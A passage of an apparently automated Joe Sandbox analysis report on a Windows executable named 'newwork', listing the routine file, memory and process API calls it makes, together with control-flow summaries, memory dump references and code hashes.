                                                                                        • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8,00000000), ref: 00409A70
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                        • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8), ref: 00409AA4
                                                                                          • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02092474), ref: 0040966C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                        • String ID: D
                                                                                        • API String ID: 3356880605-2746444292
                                                                                        • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                        • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                        • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                        • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                        Control-flow Graph

                                                                                        Graph summary (interactive graph not rendered; edge list kept as text): entry block 401918-40193a calls RtlInitializeCriticalSection; 40193c-401941 calls RtlEnterCriticalSection; 401946-40197c calls 4012dc three times and then LocalAlloc; 401983-401995 is a loop entered via 40197e and left through 401997-4019a6; 4019ad-4019c1 leads to RtlLeaveCriticalSection at 4019c3-4019c8 and the exit at 4019cd.
                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                        • String ID:
                                                                                        • API String ID: 730355536-0
                                                                                        • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                        • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                        • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                        • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: .tmp$y@
                                                                                        • API String ID: 2030045667-2396523267
                                                                                        • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                        • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                        • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                        • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: .tmp$y@
                                                                                        • API String ID: 2030045667-2396523267
                                                                                        • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                        • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                        • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                        • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID: .tmp
                                                                                        • API String ID: 1375471231-2986845003
                                                                                        • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                        • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                        • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                        • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                        Control-flow Graph (graph rendering omitted; basic blocks span 4076dc-407917 and include the WriteFile call at 4076dc, calls to 40748c, 4073ec and 407890, and the InterlockedExchange call at 4078d6)
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                        • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                        • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                        • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                        Control-flow Graph (graph rendering omitted; basic blocks span 401fd4-402158 and include a call to 401918, RtlEnterCriticalSection at 402012, calls to 401ee0 and 402f54, and RtlLeaveCriticalSection at 40213d)
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                          • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                          • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                          • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                          • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                        • String ID:
                                                                                        • API String ID: 296031713-0
                                                                                        • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                        • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                        • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                        • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                        Control-flow Graph (graph rendering omitted; single basic block 406fa0-406ff3: SetErrorMode, call to 403414, LoadLibraryA)
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLibraryLoadMode
                                                                                        • String ID:
                                                                                        • API String ID: 2987862817-0
                                                                                        • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                        • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                        • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                        • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                        APIs
                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                        • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 1156039329-0
                                                                                        • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                        • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                        • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                        • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                        Control-flow Graph (graph rendering omitted; basic blocks span 40762c-40766a: ReadFile at 40762c, GetLastError at 407652, call to 40748c at 40765c)
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastRead
                                                                                        • String ID:
                                                                                        • API String ID: 1948546556-0
                                                                                        • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                        • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                        • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                        • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                        APIs
                                                                                        • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                        • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 1156039329-0
                                                                                        • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                        • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                        • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                        • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 2087232378-0
                                                                                        • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                        • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                        • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                        • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                        APIs
                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                          • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                          • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                        • String ID:
                                                                                        • API String ID: 1658689577-0
                                                                                        • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                        • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                        • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                        • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                        • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                        • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                        • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                        • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                        • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                        • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                        • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                        • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                        • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastWrite
                                                                                        • String ID:
                                                                                        • API String ID: 442123175-0
                                                                                        • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                        • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                        • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                        • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                        APIs
                                                                                        • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatMessage
                                                                                        • String ID:
                                                                                        • API String ID: 1306739567-0
                                                                                        • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                        • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                        • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                        • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                        APIs
                                                                                        • SetEndOfFile.KERNEL32(?,020A8000,0040AA59,00000000), ref: 004076B3
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020903AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
